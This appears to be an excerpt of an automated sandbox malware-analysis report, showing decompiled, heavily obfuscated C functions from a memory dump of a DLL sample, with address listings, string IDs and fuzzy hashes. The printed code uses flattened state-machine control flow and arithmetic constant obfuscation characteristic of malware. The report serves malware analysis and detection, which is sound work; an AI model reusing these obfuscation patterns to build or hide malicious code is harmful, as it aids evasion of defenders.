                                                                                                                                                                            				_t327 = __edx;
                                                                                                                                                                            				_push(_t299);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t261);
                                                                                                                                                                            				_v92 = 0x4ad2af;
                                                                                                                                                                            				_t337 =  &(( &_v124)[4]);
                                                                                                                                                                            				_v92 = _v92 << 4;
                                                                                                                                                                            				_t325 = 0;
                                                                                                                                                                            				_t301 = 0xeae8bd1;
                                                                                                                                                                            				_t328 = 0x27;
                                                                                                                                                                            				_v92 = _v92 * 0x30;
                                                                                                                                                                            				_v92 = _v92 ^ 0xe0780d01;
                                                                                                                                                                            				_v32 = 0x52ecdf;
                                                                                                                                                                            				_v32 = _v32 | 0x4795fc12;
                                                                                                                                                                            				_v32 = _v32 ^ 0x47d7fcde;
                                                                                                                                                                            				_v40 = 0x6c24d1;
                                                                                                                                                                            				_v40 = _v40 + 0xffffd677;
                                                                                                                                                                            				_v40 = _v40 ^ 0x006bfb48;
                                                                                                                                                                            				_v124 = 0xafb159;
                                                                                                                                                                            				_v124 = _v124 + 0x853c;
                                                                                                                                                                            				_v124 = _v124 * 0x3c;
                                                                                                                                                                            				_v124 = _v124 + 0xffffb483;
                                                                                                                                                                            				_v124 = _v124 ^ 0x294c7f6f;
                                                                                                                                                                            				_v116 = 0x2e5989;
                                                                                                                                                                            				_v116 = _v116 << 3;
                                                                                                                                                                            				_v116 = _v116 << 0xc;
                                                                                                                                                                            				_v116 = _v116 + 0xffff32fd;
                                                                                                                                                                            				_v116 = _v116 ^ 0x2cc3b2fd;
                                                                                                                                                                            				_v104 = 0xb70fe2;
                                                                                                                                                                            				_v104 = _v104 * 0x61;
                                                                                                                                                                            				_v104 = _v104 >> 0xd;
                                                                                                                                                                            				_v104 = _v104 >> 9;
                                                                                                                                                                            				_v104 = _v104 ^ 0x00000115;
                                                                                                                                                                            				_v20 = 0x29c7ba;
                                                                                                                                                                            				_v20 = _v20 / _t328;
                                                                                                                                                                            				_v20 = _v20 ^ 0x0001123f;
                                                                                                                                                                            				_v44 = 0xd235de;
                                                                                                                                                                            				_t329 = 0x19;
                                                                                                                                                                            				_v44 = _v44 * 0x34;
                                                                                                                                                                            				_v44 = _v44 ^ 0x2ab83bf3;
                                                                                                                                                                            				_v120 = 0x2b8a20;
                                                                                                                                                                            				_v120 = _v120 / _t329;
                                                                                                                                                                            				_v120 = _v120 + 0xd97b;
                                                                                                                                                                            				_v120 = _v120 + 0x9745;
                                                                                                                                                                            				_v120 = _v120 ^ 0x00091694;
                                                                                                                                                                            				_v80 = 0x44ed89;
                                                                                                                                                                            				_v80 = _v80 << 8;
                                                                                                                                                                            				_v80 = _v80 + 0x6d47;
                                                                                                                                                                            				_v80 = _v80 ^ 0x44e06617;
                                                                                                                                                                            				_v84 = 0x8c3da4;
                                                                                                                                                                            				_v84 = _v84 << 3;
                                                                                                                                                                            				_v84 = _v84 + 0xffff28ee;
                                                                                                                                                                            				_v84 = _v84 ^ 0x04621daf;
                                                                                                                                                                            				_v88 = 0x7b0e01;
                                                                                                                                                                            				_t330 = 0x2a;
                                                                                                                                                                            				_v88 = _v88 * 0x7e;
                                                                                                                                                                            				_v88 = _v88 / _t330;
                                                                                                                                                                            				_v88 = _v88 ^ 0x01771ea0;
                                                                                                                                                                            				_v48 = 0xf210e7;
                                                                                                                                                                            				_t331 = 0x56;
                                                                                                                                                                            				_v48 = _v48 / _t331;
                                                                                                                                                                            				_v48 = _v48 ^ 0x000151ed;
                                                                                                                                                                            				_v52 = 0xb85aaa;
                                                                                                                                                                            				_v52 = _v52 ^ 0x7279f80c;
                                                                                                                                                                            				_v52 = _v52 ^ 0x72c0fdc9;
                                                                                                                                                                            				_v108 = 0xe210ad;
                                                                                                                                                                            				_v108 = _v108 + 0xffffc30f;
                                                                                                                                                                            				_v108 = _v108 ^ 0xff005d9c;
                                                                                                                                                                            				_v108 = _v108 ^ 0x468aee4e;
                                                                                                                                                                            				_v108 = _v108 ^ 0xb96c249f;
                                                                                                                                                                            				_v36 = 0xf02045;
                                                                                                                                                                            				_t332 = 0x7e;
                                                                                                                                                                            				_v36 = _v36 * 0x7d;
                                                                                                                                                                            				_v36 = _v36 ^ 0x753d6877;
                                                                                                                                                                            				_v76 = 0x890c0b;
                                                                                                                                                                            				_v76 = _v76 | 0x3fa19484;
                                                                                                                                                                            				_v76 = _v76 + 0xc76f;
                                                                                                                                                                            				_v76 = _v76 ^ 0x3fa932ba;
                                                                                                                                                                            				_v112 = 0xdcee96;
                                                                                                                                                                            				_v112 = _v112 << 0xb;
                                                                                                                                                                            				_v112 = _v112 / _t332;
                                                                                                                                                                            				_v112 = _v112 ^ 0x6c4d9ccb;
                                                                                                                                                                            				_v112 = _v112 ^ 0x6d94fd95;
                                                                                                                                                                            				_v56 = 0x741505;
                                                                                                                                                                            				_t333 = 0x1d;
                                                                                                                                                                            				_v56 = _v56 / _t333;
                                                                                                                                                                            				_v56 = _v56 + 0xe34c;
                                                                                                                                                                            				_v56 = _v56 ^ 0x00059e64;
                                                                                                                                                                            				_v24 = 0xde7835;
                                                                                                                                                                            				_t334 = 0x73;
                                                                                                                                                                            				_v24 = _v24 * 7;
                                                                                                                                                                            				_v24 = _v24 ^ 0x0614b333;
                                                                                                                                                                            				_v28 = 0x817a7e;
                                                                                                                                                                            				_v28 = _v28 + 0x50ff;
                                                                                                                                                                            				_v28 = _v28 ^ 0x008db9da;
                                                                                                                                                                            				_v60 = 0x30460f;
                                                                                                                                                                            				_v60 = _v60 | 0x5b476089;
                                                                                                                                                                            				_v60 = _v60 + 0x7857;
                                                                                                                                                                            				_v60 = _v60 ^ 0x5b7b85ad;
                                                                                                                                                                            				_v64 = 0x3287c5;
                                                                                                                                                                            				_v64 = _v64 >> 0x10;
                                                                                                                                                                            				_v64 = _v64 | 0xf6bf374a;
                                                                                                                                                                            				_v64 = _v64 ^ 0xf6be02d9;
                                                                                                                                                                            				_v68 = 0xbf5def;
                                                                                                                                                                            				_v68 = _v68 + 0xffff47b3;
                                                                                                                                                                            				_v68 = _v68 + 0xffff0d11;
                                                                                                                                                                            				_v68 = _v68 ^ 0x00bf58a8;
                                                                                                                                                                            				_v72 = 0xc5c956;
                                                                                                                                                                            				_v72 = _v72 ^ 0x0920ed5d;
                                                                                                                                                                            				_v72 = _v72 / _t334;
                                                                                                                                                                            				_v72 = _v72 ^ 0x00102287;
                                                                                                                                                                            				_v16 = 0x6e7810;
                                                                                                                                                                            				_v16 = _v16 + 0xffff2e79;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0061adb7;
                                                                                                                                                                            				_v96 = 0xe3f1bb;
                                                                                                                                                                            				_v96 = _v96 | 0x17c89f2a;
                                                                                                                                                                            				_v96 = _v96 ^ 0x2d56d01e;
                                                                                                                                                                            				_v96 = _v96 ^ 0x01e2669f;
                                                                                                                                                                            				_v96 = _v96 ^ 0x3b5230bc;
                                                                                                                                                                            				_v100 = 0x967d31;
                                                                                                                                                                            				_v100 = _v100 | 0xebdf376e;
                                                                                                                                                                            				_v100 = _v100 + 0x87ad;
                                                                                                                                                                            				_v100 = _v100 ^ 0xebeed43d;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t301 != 0x242fff5) {
                                                                                                                                                                            						if(_t301 == 0x95dc10a) {
                                                                                                                                                                            							_push(_t301);
                                                                                                                                                                            							_push(_t301);
                                                                                                                                                                            							_t294 = E02F5C5D8(_v8);
                                                                                                                                                                            							_t337 =  &(_t337[3]);
                                                                                                                                                                            							_v12 = _t294;
                                                                                                                                                                            							if(_t294 != 0) {
                                                                                                                                                                            								_t301 = 0x242fff5;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t301 == 0xb01d963) {
                                                                                                                                                                            								_t295 =  *0x2f76224; // 0x0
                                                                                                                                                                            								_t297 = E02F52194(_v40, _v44, _t301, _v120, _v80, _v124, _v84, _v88, _t301, _v48,  *_t327, _v52,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v92,  *_t295, _t325);
                                                                                                                                                                            								_t337 =  &(_t337[0xf]);
                                                                                                                                                                            								if(_t297 == _v116) {
                                                                                                                                                                            									_t301 = 0x95dc10a;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t301 == 0xb93db5b) {
                                                                                                                                                                            									E02F72B09(_v16, _v12, _v96, _v100);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t301 != 0xeae8bd1) {
                                                                                                                                                                            										goto L13;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t301 = 0xb01d963;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L17:
                                                                                                                                                                            						return _t325;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t284 =  *0x2f76224; // 0x0
                                                                                                                                                                            					_t286 = E02F52194(_v8, _v56, _t301, _v24, _v28, _v104, _v60, _v64, _t301, _v68,  *_t327, _v72,  &_v8,  *((intOrPtr*)(_t327 + 4)), _v32,  *_t284, _v12);
                                                                                                                                                                            					_t337 =  &(_t337[0xf]);
                                                                                                                                                                            					if(_t286 == _v20) {
                                                                                                                                                                            						 *_t299 = _v12;
                                                                                                                                                                            						_t325 = 1;
                                                                                                                                                                            						 *((intOrPtr*)(_t299 + 4)) = _v8;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t301 = 0xb93db5b;
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L17;
                                                                                                                                                                            					L13:
                                                                                                                                                                            				} while (_t301 != 0xf5a5c60);
                                                                                                                                                                            				goto L17;
                                                                                                                                                                            			}



















































                                                                                                                                                                            0x02f5fb92
                                                                                                                                                                            0x02f5fb9c
                                                                                                                                                                            0x02f5fba3
                                                                                                                                                                            0x02f5fba5
                                                                                                                                                                            0x02f5fba6
                                                                                                                                                                            0x02f5fba7
                                                                                                                                                                            0x02f5fba8
                                                                                                                                                                            0x02f5fbad
                                                                                                                                                                            0x02f5fbb5
                                                                                                                                                                            0x02f5fbb8
                                                                                                                                                                            0x02f5fbc4
                                                                                                                                                                            0x02f5fbc6
                                                                                                                                                                            0x02f5fbcd
                                                                                                                                                                            0x02f5fbd0
                                                                                                                                                                            0x02f5fbd4
                                                                                                                                                                            0x02f5fbdc
                                                                                                                                                                            0x02f5fbe4
                                                                                                                                                                            0x02f5fbec
                                                                                                                                                                            0x02f5fbf4
                                                                                                                                                                            0x02f5fbfc
                                                                                                                                                                            0x02f5fc04
                                                                                                                                                                            0x02f5fc0c
                                                                                                                                                                            0x02f5fc14
                                                                                                                                                                            0x02f5fc21
                                                                                                                                                                            0x02f5fc25
                                                                                                                                                                            0x02f5fc2d
                                                                                                                                                                            0x02f5fc35
                                                                                                                                                                            0x02f5fc3d
                                                                                                                                                                            0x02f5fc42
                                                                                                                                                                            0x02f5fc47
                                                                                                                                                                            0x02f5fc4f
                                                                                                                                                                            0x02f5fc57
                                                                                                                                                                            0x02f5fc64
                                                                                                                                                                            0x02f5fc68
                                                                                                                                                                            0x02f5fc6d
                                                                                                                                                                            0x02f5fc72
                                                                                                                                                                            0x02f5fc7a
                                                                                                                                                                            0x02f5fc8a
                                                                                                                                                                            0x02f5fc8e
                                                                                                                                                                            0x02f5fc96
                                                                                                                                                                            0x02f5fca3
                                                                                                                                                                            0x02f5fca6
                                                                                                                                                                            0x02f5fcaa
                                                                                                                                                                            0x02f5fcb2
                                                                                                                                                                            0x02f5fcc2
                                                                                                                                                                            0x02f5fcc6
                                                                                                                                                                            0x02f5fcce
                                                                                                                                                                            0x02f5fcd6
                                                                                                                                                                            0x02f5fcde
                                                                                                                                                                            0x02f5fce6
                                                                                                                                                                            0x02f5fceb
                                                                                                                                                                            0x02f5fcf3
                                                                                                                                                                            0x02f5fcfb
                                                                                                                                                                            0x02f5fd03
                                                                                                                                                                            0x02f5fd08
                                                                                                                                                                            0x02f5fd10
                                                                                                                                                                            0x02f5fd18
                                                                                                                                                                            0x02f5fd25
                                                                                                                                                                            0x02f5fd26
                                                                                                                                                                            0x02f5fd30
                                                                                                                                                                            0x02f5fd34
                                                                                                                                                                            0x02f5fd3e
                                                                                                                                                                            0x02f5fd4c
                                                                                                                                                                            0x02f5fd51
                                                                                                                                                                            0x02f5fd57
                                                                                                                                                                            0x02f5fd5f
                                                                                                                                                                            0x02f5fd67
                                                                                                                                                                            0x02f5fd6f
                                                                                                                                                                            0x02f5fd77
                                                                                                                                                                            0x02f5fd7f
                                                                                                                                                                            0x02f5fd87
                                                                                                                                                                            0x02f5fd8f
                                                                                                                                                                            0x02f5fd97
                                                                                                                                                                            0x02f5fd9f
                                                                                                                                                                            0x02f5fdac
                                                                                                                                                                            0x02f5fdaf
                                                                                                                                                                            0x02f5fdb3
                                                                                                                                                                            0x02f5fdbb
                                                                                                                                                                            0x02f5fdc3
                                                                                                                                                                            0x02f5fdcb
                                                                                                                                                                            0x02f5fdd3
                                                                                                                                                                            0x02f5fddb
                                                                                                                                                                            0x02f5fde3
                                                                                                                                                                            0x02f5fdf0
                                                                                                                                                                            0x02f5fdf4
                                                                                                                                                                            0x02f5fdfc
                                                                                                                                                                            0x02f5fe04
                                                                                                                                                                            0x02f5fe10
                                                                                                                                                                            0x02f5fe15
                                                                                                                                                                            0x02f5fe1b
                                                                                                                                                                            0x02f5fe23
                                                                                                                                                                            0x02f5fe2b
                                                                                                                                                                            0x02f5fe38
                                                                                                                                                                            0x02f5fe39
                                                                                                                                                                            0x02f5fe3d
                                                                                                                                                                            0x02f5fe45
                                                                                                                                                                            0x02f5fe4d
                                                                                                                                                                            0x02f5fe55
                                                                                                                                                                            0x02f5fe5d
                                                                                                                                                                            0x02f5fe65
                                                                                                                                                                            0x02f5fe6d
                                                                                                                                                                            0x02f5fe75
                                                                                                                                                                            0x02f5fe7d
                                                                                                                                                                            0x02f5fe85
                                                                                                                                                                            0x02f5fe8a
                                                                                                                                                                            0x02f5fe92
                                                                                                                                                                            0x02f5fe9a
                                                                                                                                                                            0x02f5fea2
                                                                                                                                                                            0x02f5feaa
                                                                                                                                                                            0x02f5feb2
                                                                                                                                                                            0x02f5feba
                                                                                                                                                                            0x02f5fec2
                                                                                                                                                                            0x02f5fed0
                                                                                                                                                                            0x02f5fed4
                                                                                                                                                                            0x02f5fedc
                                                                                                                                                                            0x02f5fee4
                                                                                                                                                                            0x02f5feec
                                                                                                                                                                            0x02f5fef4
                                                                                                                                                                            0x02f5fefc
                                                                                                                                                                            0x02f5ff04
                                                                                                                                                                            0x02f5ff0c
                                                                                                                                                                            0x02f5ff14
                                                                                                                                                                            0x02f5ff1c
                                                                                                                                                                            0x02f5ff24
                                                                                                                                                                            0x02f5ff31
                                                                                                                                                                            0x02f5ff39
                                                                                                                                                                            0x02f5ff41
                                                                                                                                                                            0x02f5ff41
                                                                                                                                                                            0x02f5ff4f
                                                                                                                                                                            0x02f5ffed
                                                                                                                                                                            0x02f5ffee
                                                                                                                                                                            0x02f5fff6
                                                                                                                                                                            0x02f5fffb
                                                                                                                                                                            0x02f5fffe
                                                                                                                                                                            0x02f60007
                                                                                                                                                                            0x02f6000d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6000d
                                                                                                                                                                            0x02f5ff55
                                                                                                                                                                            0x02f5ff5b
                                                                                                                                                                            0x02f5ff7c
                                                                                                                                                                            0x02f5ffc1
                                                                                                                                                                            0x02f5ffc6
                                                                                                                                                                            0x02f5ffcd
                                                                                                                                                                            0x02f5ffd3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ffd3
                                                                                                                                                                            0x02f5ff5d
                                                                                                                                                                            0x02f5ff63
                                                                                                                                                                            0x02f6009c
                                                                                                                                                                            0x02f5ff69
                                                                                                                                                                            0x02f5ff6f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ff75
                                                                                                                                                                            0x02f5ff75
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ff75
                                                                                                                                                                            0x02f5ff6f
                                                                                                                                                                            0x02f5ff63
                                                                                                                                                                            0x02f5ff5b
                                                                                                                                                                            0x02f600bb
                                                                                                                                                                            0x02f600c4
                                                                                                                                                                            0x02f600c4
                                                                                                                                                                            0x02f6001b
                                                                                                                                                                            0x02f60065
                                                                                                                                                                            0x02f6006a
                                                                                                                                                                            0x02f60071
                                                                                                                                                                            0x02f600ae
                                                                                                                                                                            0x02f600b0
                                                                                                                                                                            0x02f600b8
                                                                                                                                                                            0x02f60073
                                                                                                                                                                            0x02f60073
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f60073
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f60078
                                                                                                                                                                            0x02f60078
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Gm$L$Wx$] $wh=u
                                                                                                                                                                            • API String ID: 0-1494249286
                                                                                                                                                                            • Opcode ID: a12bee773bb46119d7ce1140af0f9bc9219d225960f8081fdc25e3c7fce508a8
                                                                                                                                                                            • Instruction ID: b7ef622b38021ad292f44f1626cf8bf573f746c373b201aa1cb5dccb1299154e
                                                                                                                                                                            • Opcode Fuzzy Hash: a12bee773bb46119d7ce1140af0f9bc9219d225960f8081fdc25e3c7fce508a8
                                                                                                                                                                            • Instruction Fuzzy Hash: 01D11F724097809FD768CF65C88991BFBF1FB85788F208A1DF69586260D7B28949CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F68D3D() {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                                            				intOrPtr _t147;
                                                                                                                                                                            				signed int _t151;
                                                                                                                                                                            				signed int _t152;
                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                            				signed int _t154;
                                                                                                                                                                            				intOrPtr* _t155;
                                                                                                                                                                            				signed int _t170;
                                                                                                                                                                            				void* _t172;
                                                                                                                                                                            				signed int* _t174;
                                                                                                                                                                            
                                                                                                                                                                            				_t174 =  &_v60;
                                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                                            				_v16 = 0xb96ea3;
                                                                                                                                                                            				_v12 = 0x2b597c;
                                                                                                                                                                            				_v8 = 0x15d14c;
                                                                                                                                                                            				_v24 = 0xfb9f01;
                                                                                                                                                                            				_v24 = _v24 + 0xffffc2ea;
                                                                                                                                                                            				_v24 = _v24 ^ 0x00f09b24;
                                                                                                                                                                            				_v28 = 0x44d8ac;
                                                                                                                                                                            				_v28 = _v28 << 2;
                                                                                                                                                                            				_v28 = _v28 ^ 0x0118b46b;
                                                                                                                                                                            				_v56 = 0xb4bcfb;
                                                                                                                                                                            				_v56 = _v56 >> 0x10;
                                                                                                                                                                            				_v56 = _v56 + 0x1918;
                                                                                                                                                                            				_t151 = 0x33;
                                                                                                                                                                            				_v56 = _v56 / _t151;
                                                                                                                                                                            				_t172 = 0x18a299a;
                                                                                                                                                                            				_v56 = _v56 ^ 0x00075f97;
                                                                                                                                                                            				_v60 = 0x54631c;
                                                                                                                                                                            				_t152 = 0x32;
                                                                                                                                                                            				_v60 = _v60 / _t152;
                                                                                                                                                                            				_v60 = _v60 + 0xe0cb;
                                                                                                                                                                            				_v60 = _v60 + 0x7b8a;
                                                                                                                                                                            				_v60 = _v60 ^ 0x000a1fda;
                                                                                                                                                                            				_v32 = 0x2b0ed;
                                                                                                                                                                            				_v32 = _v32 >> 0xb;
                                                                                                                                                                            				_v32 = _v32 | 0x09ea9e28;
                                                                                                                                                                            				_v32 = _v32 ^ 0x09ed7baa;
                                                                                                                                                                            				_v48 = 0x16a7f0;
                                                                                                                                                                            				_v48 = _v48 << 6;
                                                                                                                                                                            				_t170 = 0x54;
                                                                                                                                                                            				_v48 = _v48 / _t170;
                                                                                                                                                                            				_t153 = 0x50;
                                                                                                                                                                            				_v48 = _v48 / _t153;
                                                                                                                                                                            				_v48 = _v48 ^ 0x000d9328;
                                                                                                                                                                            				_v52 = 0x3f1fdb;
                                                                                                                                                                            				_v52 = _v52 | 0x0053e637;
                                                                                                                                                                            				_v52 = _v52 ^ 0xce168c33;
                                                                                                                                                                            				_v52 = _v52 >> 4;
                                                                                                                                                                            				_v52 = _v52 ^ 0x0ce6f5f4;
                                                                                                                                                                            				_v36 = 0x33e495;
                                                                                                                                                                            				_v36 = _v36 + 0xc7cc;
                                                                                                                                                                            				_v36 = _v36 / _t170;
                                                                                                                                                                            				_v36 = _v36 + 0x230d;
                                                                                                                                                                            				_v36 = _v36 ^ 0x000308d4;
                                                                                                                                                                            				_v40 = 0xaa804b;
                                                                                                                                                                            				_t139 = _v40;
                                                                                                                                                                            				_t154 = 0x42;
                                                                                                                                                                            				_t169 = _t139 % _t154;
                                                                                                                                                                            				_v40 = _t139 / _t154;
                                                                                                                                                                            				_v40 = _v40 + 0xffff246c;
                                                                                                                                                                            				_v40 = _v40 >> 7;
                                                                                                                                                                            				_v40 = _v40 ^ 0x000d5f20;
                                                                                                                                                                            				_v44 = 0x5ad1c5;
                                                                                                                                                                            				_v44 = _v44 + 0x4d5e;
                                                                                                                                                                            				_v44 = _v44 + 0xffff9f53;
                                                                                                                                                                            				_v44 = _v44 + 0xffff11b0;
                                                                                                                                                                            				_v44 = _v44 ^ 0x005bbdbb;
                                                                                                                                                                            				_v20 = 0x89125f;
                                                                                                                                                                            				_v20 = _v20 ^ 0x0bb83411;
                                                                                                                                                                            				_v20 = _v20 ^ 0x0b3ba340;
                                                                                                                                                                            				_t155 =  *0x2f76208; // 0x0
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t172 != 0x550abf) {
                                                                                                                                                                            						if(_t172 == 0x18a299a) {
                                                                                                                                                                            							_push(_t155);
                                                                                                                                                                            							_push(_t155);
                                                                                                                                                                            							_t155 = E02F5C5D8(0x2c);
                                                                                                                                                                            							_t174 =  &(_t174[3]);
                                                                                                                                                                            							 *0x2f76208 = _t155;
                                                                                                                                                                            							_t172 = 0x550abf;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t172 != 0x6125a42) {
                                                                                                                                                                            								goto L8;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t147 = E02F60EBC(_v36, _t169, _v40, _t155, _v44, _v20, _t155, _t155, 0, E02F736AA);
                                                                                                                                                                            								_t155 =  *0x2f76208; // 0x0
                                                                                                                                                                            								 *_t155 = _t147;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L5:
                                                                                                                                                                            						return 0 | _t155 != 0x00000000;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t169 = _v48;
                                                                                                                                                                            					_t141 = E02F548DD(_v32, _v48, _v52);
                                                                                                                                                                            					_t155 =  *0x2f76208; // 0x0
                                                                                                                                                                            					_t174 = _t174 - 0x10 + 0x14;
                                                                                                                                                                            					_t172 = 0x6125a42;
                                                                                                                                                                            					 *((intOrPtr*)(_t155 + 0x18)) = _t141;
                                                                                                                                                                            					L8:
                                                                                                                                                                            				} while (_t172 != 0x92686f5);
                                                                                                                                                                            				goto L5;
                                                                                                                                                                            			}





























                                                                                                                                                                            0x02f68d3d
                                                                                                                                                                            0x02f68d40
                                                                                                                                                                            0x02f68d47
                                                                                                                                                                            0x02f68d4f
                                                                                                                                                                            0x02f68d57
                                                                                                                                                                            0x02f68d5f
                                                                                                                                                                            0x02f68d67
                                                                                                                                                                            0x02f68d6f
                                                                                                                                                                            0x02f68d77
                                                                                                                                                                            0x02f68d7f
                                                                                                                                                                            0x02f68d84
                                                                                                                                                                            0x02f68d8c
                                                                                                                                                                            0x02f68d94
                                                                                                                                                                            0x02f68d99
                                                                                                                                                                            0x02f68dab
                                                                                                                                                                            0x02f68db5
                                                                                                                                                                            0x02f68db9
                                                                                                                                                                            0x02f68dbb
                                                                                                                                                                            0x02f68dc3
                                                                                                                                                                            0x02f68dd1
                                                                                                                                                                            0x02f68dd6
                                                                                                                                                                            0x02f68dda
                                                                                                                                                                            0x02f68de2
                                                                                                                                                                            0x02f68dea
                                                                                                                                                                            0x02f68df2
                                                                                                                                                                            0x02f68dfa
                                                                                                                                                                            0x02f68dff
                                                                                                                                                                            0x02f68e07
                                                                                                                                                                            0x02f68e0f
                                                                                                                                                                            0x02f68e17
                                                                                                                                                                            0x02f68e22
                                                                                                                                                                            0x02f68e27
                                                                                                                                                                            0x02f68e31
                                                                                                                                                                            0x02f68e36
                                                                                                                                                                            0x02f68e3a
                                                                                                                                                                            0x02f68e42
                                                                                                                                                                            0x02f68e4a
                                                                                                                                                                            0x02f68e52
                                                                                                                                                                            0x02f68e5a
                                                                                                                                                                            0x02f68e5f
                                                                                                                                                                            0x02f68e67
                                                                                                                                                                            0x02f68e6f
                                                                                                                                                                            0x02f68e7f
                                                                                                                                                                            0x02f68e85
                                                                                                                                                                            0x02f68e8d
                                                                                                                                                                            0x02f68e95
                                                                                                                                                                            0x02f68e9d
                                                                                                                                                                            0x02f68ea1
                                                                                                                                                                            0x02f68ea2
                                                                                                                                                                            0x02f68ea4
                                                                                                                                                                            0x02f68ea8
                                                                                                                                                                            0x02f68eb0
                                                                                                                                                                            0x02f68eb5
                                                                                                                                                                            0x02f68ebd
                                                                                                                                                                            0x02f68ec5
                                                                                                                                                                            0x02f68ecd
                                                                                                                                                                            0x02f68ed5
                                                                                                                                                                            0x02f68ee2
                                                                                                                                                                            0x02f68eef
                                                                                                                                                                            0x02f68ef7
                                                                                                                                                                            0x02f68eff
                                                                                                                                                                            0x02f68f07
                                                                                                                                                                            0x02f68f0d
                                                                                                                                                                            0x02f68f0d
                                                                                                                                                                            0x02f68f13
                                                                                                                                                                            0x02f68f66
                                                                                                                                                                            0x02f68f67
                                                                                                                                                                            0x02f68f6f
                                                                                                                                                                            0x02f68f71
                                                                                                                                                                            0x02f68f74
                                                                                                                                                                            0x02f68f7a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68f15
                                                                                                                                                                            0x02f68f17
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68f1d
                                                                                                                                                                            0x02f68f37
                                                                                                                                                                            0x02f68f3c
                                                                                                                                                                            0x02f68f45
                                                                                                                                                                            0x02f68f45
                                                                                                                                                                            0x02f68f17
                                                                                                                                                                            0x02f68f48
                                                                                                                                                                            0x02f68f55
                                                                                                                                                                            0x02f68f55
                                                                                                                                                                            0x02f68f85
                                                                                                                                                                            0x02f68f8d
                                                                                                                                                                            0x02f68f92
                                                                                                                                                                            0x02f68f98
                                                                                                                                                                            0x02f68f9b
                                                                                                                                                                            0x02f68f9d
                                                                                                                                                                            0x02f68fa0
                                                                                                                                                                            0x02f68fa0
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: #$ _$7S$^M$|Y+
                                                                                                                                                                            • API String ID: 0-3744723356
                                                                                                                                                                            • Opcode ID: 45e729b41ef524c851baf68780ce05f9b811e5aba3bca30ca743b3be608215c4
                                                                                                                                                                            • Instruction ID: bd963e597ecf41e0d31b92b3b9eb327b54a558bad4635460844c17f8c7b0dc44
                                                                                                                                                                            • Opcode Fuzzy Hash: 45e729b41ef524c851baf68780ce05f9b811e5aba3bca30ca743b3be608215c4
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D5178715087419FD348CF25D88951BBBE1FBC87A8F008E1DF199A6260D7B4CA49CF4A
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
